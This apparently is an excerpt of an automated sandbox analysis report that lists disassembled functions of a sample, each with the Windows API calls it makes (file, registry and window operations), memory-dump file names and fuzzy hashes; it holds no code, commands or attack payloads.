                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: InfoScroll
                                                                  • String ID:
                                                                  • API String ID: 629608716-0
                                                                  • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                  • Instruction ID: d0a12eb0c5d8f31e5c98d8a2781f1eb62c39d12b06d2a108fd5dac4500059ce8
                                                                  • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                  • Instruction Fuzzy Hash: C02130B16087466FC340DF39C5447A6BBE4BB88304F04893EA498C3741E778E996CBD6
                                                                  Function 0046C270 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0041EE9C: GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                                    • Part of subcall function 0041EE9C: 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                                  • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C2CE,?,00000000,?,?,0046C4E0,?,00000000,0046C554), ref: 0046C2B2
                                                                    • Part of subcall function 0041EF50: IsWindow.USER32(?), ref: 0041EF5E
                                                                    • Part of subcall function 0041EF50: EnableWindow.USER32(?,00000001), ref: 0041EF6D
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$A25940CurrentEnablePathPrepareThreadWrite
                                                                  • String ID:
                                                                  • API String ID: 390483697-0
                                                                  • Opcode ID: 1950fa63623794e8b6cf7dfe712e88d918e2b7d9557fc3b7505cef75313acc34
                                                                  • Instruction ID: 435c92a82c98609a262d66890dafa743f24e5c1e823ccadb8e8beb41f7667319
                                                                  • Opcode Fuzzy Hash: 1950fa63623794e8b6cf7dfe712e88d918e2b7d9557fc3b7505cef75313acc34
                                                                  • Instruction Fuzzy Hash: 95F059B1288300BFE7049BF2ECA6B2577E9E318720F510477F904821C0E5B95800C51E
                                                                  Function 0044138C Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                  • Instruction ID: bbd698397dbc8f39e4f55c310c3945233451addb9156919cc96357002ab2f652
                                                                  • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                  • Instruction Fuzzy Hash: 66F06271614109DBBB1CCF58D1519AF7BA0EB44310B20406FF907C7BA0E6346E90DA58
                                                                  Function 00416548 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 0041657D
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                  • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                                  • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                  • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                                  Function 004149AC Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149E7
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                  • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                  • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                  • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                  Function 00450798 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004507D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: fdd558c29566e738fcbdedabbf129a38e9c66ac316c6ebf650c30ee427f19e4e
                                                                  • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                  • Opcode Fuzzy Hash: fdd558c29566e738fcbdedabbf129a38e9c66ac316c6ebf650c30ee427f19e4e
                                                                  • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                  Function 0042CCC4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD0C,?,00000001,?,?,00000000,?,0042CD5E,00000000,004529F9,00000000,00452A1A,?,00000000), ref: 0042CCEF
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 416bf2ec68b95bcc5af0582ff2491831708fe8216b24dbe794372527742e75b2
                                                                  • Instruction ID: 6c88cd9b3502ecc0d8ec22600fa2d9d68314b02b8b7bc0d4dcd5a0b3e687a907
                                                                  • Opcode Fuzzy Hash: 416bf2ec68b95bcc5af0582ff2491831708fe8216b24dbe794372527742e75b2
                                                                  • Instruction Fuzzy Hash: 62E0E570300304BFDB01EB62AC82A5EBFECDB45704BA14876B400A7242D5785E008418
                                                                  Function 0042E8C0 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FormatMessage
                                                                  • String ID:
                                                                  • API String ID: 1306739567-0
                                                                  • Opcode ID: e6d3d52e8f4f63ecf0b34621506695ba35df63bdde710507be70f7165fd629ff
                                                                  • Instruction ID: 2ce6c9ff4e19e0960d9753b9113d8e2cc47385edbc752d5ed3014e636873cb34
                                                                  • Opcode Fuzzy Hash: e6d3d52e8f4f63ecf0b34621506695ba35df63bdde710507be70f7165fd629ff
                                                                  • Instruction Fuzzy Hash: 90E0D86178831116F23535566C43B77150E4380708F9840277B809E3D3D6AE9905A25E
                                                                  Function 004062E8 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWindowExA.USER32(00000000,00423674,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 00406311
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                  • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                  • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                  • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                  Function 0042DDDC Relevance: 1.5, APIs: 1, Instructions: 26registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE08
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: a2fa4b3b70172a899a44371cb6cb166e106d6f14f5a748d009f698e06f133ef9
                                                                  • Instruction ID: bece317731ff8cd2e666e34543c7a68b5f38d577bb060a1f695f350ce1c31ea4
                                                                  • Opcode Fuzzy Hash: a2fa4b3b70172a899a44371cb6cb166e106d6f14f5a748d009f698e06f133ef9
                                                                  • Instruction Fuzzy Hash: 46E07EB2610129AFDB40DE8CDC81EEB37ADAB1D350F404016FA08D7200C274EC519BB4
                                                                  Function 00454BCC Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindClose.KERNEL32(00000000,000000FF,0047078C,00000000,00471588,?,00000000,004715D1,?,00000000,0047170A,?,00000000,?,00000000), ref: 00454BE2
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseFind
                                                                  • String ID:
                                                                  • API String ID: 1863332320-0
                                                                  • Opcode ID: 06d429211cbdde73cb23459f0bbdb60b04e95dac6161286f70ab338dbad9895d
                                                                  • Instruction ID: 5b38ea55cb3c31d0920dcaeaf3b0ab9c64c5d1fc8265480bc1e0bc694521aac9
                                                                  • Opcode Fuzzy Hash: 06d429211cbdde73cb23459f0bbdb60b04e95dac6161286f70ab338dbad9895d
                                                                  • Instruction Fuzzy Hash: C3E092B0A056008BCB14DF3A898031A7AD29FC9324F04C56AEC9CCF3D7E63DC8594A27
                                                                  Function 00414674 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(00494EF2,?,00494F14,?,?,00000000,00494EF2,?,?), ref: 00414693
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                  • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                  • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                  • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                  Function 00406F00 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F14
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                                  • Instruction ID: cfde3e3822fa8edba560b3c3045b88a59d445a8db7eea6df610edd37a4bd72e7
                                                                  • Opcode Fuzzy Hash: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                                  • Instruction Fuzzy Hash: A3D012722081516AD220965AAC44EAB6BDCCBC5770F11063AB558C2181D7609C01C675
                                                                  Function 00423644 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004235F0: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 00423605
                                                                  • ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                                    • Part of subcall function 00423620: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 0042363C
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: InfoParametersSystem$ShowWindow
                                                                  • String ID:
                                                                  • API String ID: 3202724764-0
                                                                  • Opcode ID: fce0b26c2d9ed10aeec85bb6dc1e2ec36172a6d8969be9752991d6a22a5a0e05
                                                                  • Instruction ID: ebc5fdb8686796c5fd5eba84b5ab6671b787b6de9fbea9510ee25edb69bb1d0b
                                                                  • Opcode Fuzzy Hash: fce0b26c2d9ed10aeec85bb6dc1e2ec36172a6d8969be9752991d6a22a5a0e05
                                                                  • Instruction Fuzzy Hash: 7CD05E123412703182307ABB384598B46AC8D922A6749043BB4448B347ED5DCE1110BC
                                                                  Function 004242BC Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: TextWindow
                                                                  • String ID:
                                                                  • API String ID: 530164218-0
                                                                  • Opcode ID: 63c2204a93b3ceeccd91b68fb1f2f63f98ac991c37a9674dd692e28dceb45842
                                                                  • Instruction ID: 82e7bab73c65a9778cea5b734bd50d71f4a8736701fc7bbe01534373bbdf07f9
                                                                  • Opcode Fuzzy Hash: 63c2204a93b3ceeccd91b68fb1f2f63f98ac991c37a9674dd692e28dceb45842
                                                                  • Instruction Fuzzy Hash: 0BD05BE27011205BC701BAED54C4AC667CC4B4925671440BBF904EF257D638CD514398
                                                                  Function 00466968 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467650,00000000,00000000,00000000,0000000C,00000000), ref: 00466980
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                  • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                  • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                  • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                  Function 0042CD1C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,0045159F,00000000), ref: 0042CD27
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: a20a0933f9adf495ad294cc7f43800295bba8e01ea8a7e04e2e8fcb3411a2c60
                                                                  • Instruction ID: 582242be021ecdaa9f487f520a6273a00fb8a2f6ff7a96cbd182f7b59f56d267
                                                                  • Opcode Fuzzy Hash: a20a0933f9adf495ad294cc7f43800295bba8e01ea8a7e04e2e8fcb3411a2c60
                                                                  • Instruction Fuzzy Hash: 9EC08CE03222101A9E1069BD2CC521F46C8891823A3A41E3BB528E72D2E23D88262818
                                                                  Function 00406EB0 Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8BC,0040CE68,?,00000000,?), ref: 00406ECD
                                                                  Memory Dump Source
